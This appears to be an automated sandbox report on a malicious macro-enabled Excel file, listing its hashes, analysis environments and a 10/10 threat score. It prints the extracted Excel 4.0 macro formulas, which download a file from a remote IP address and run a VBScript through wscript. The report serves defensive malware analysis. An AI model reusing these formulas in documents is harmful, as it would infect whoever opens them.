General
-
Target
05a3f7b2b4af6e5375780a9f77a84391
-
Size
6KB
-
Sample
231221-1n65aabdg8
-
MD5
05a3f7b2b4af6e5375780a9f77a84391
-
SHA1
1440fdff91fd25e0596260e8f616c433ab6ffaef
-
SHA256
ca21cd7283ef1796267eeec83262a8e0c4fdda59ea5ba51e26828c49b316876e
-
SHA512
9d7a4ac7089b6d76fd4c643794a301fba188540944f3b1c47b7e8817a1164aaeacf1a758759d62bb09485fdd031d9762b84585d4ecdda52efd951bd721938324
-
SSDEEP
192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98y7K+t:NJupM2w11FY8b98y79
Static task
static1
Behavioral task
behavioral1
Sample
05a3f7b2b4af6e5375780a9f77a84391.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
05a3f7b2b4af6e5375780a9f77a84391.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
05a3f7b2b4af6e5375780a9f77a84391
-
Size
6KB
-
MD5
05a3f7b2b4af6e5375780a9f77a84391
-
SHA1
1440fdff91fd25e0596260e8f616c433ab6ffaef
-
SHA256
ca21cd7283ef1796267eeec83262a8e0c4fdda59ea5ba51e26828c49b316876e
-
SHA512
9d7a4ac7089b6d76fd4c643794a301fba188540944f3b1c47b7e8817a1164aaeacf1a758759d62bb09485fdd031d9762b84585d4ecdda52efd951bd721938324
-
SSDEEP
192:NDSeuScbrA2OmmfRv8UhHFBFYuBb98y7K+t:NJupM2w11FY8b98y79
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-